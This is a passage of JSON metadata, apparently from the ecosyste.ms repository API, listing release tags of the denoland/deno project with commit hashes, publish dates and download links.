ste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5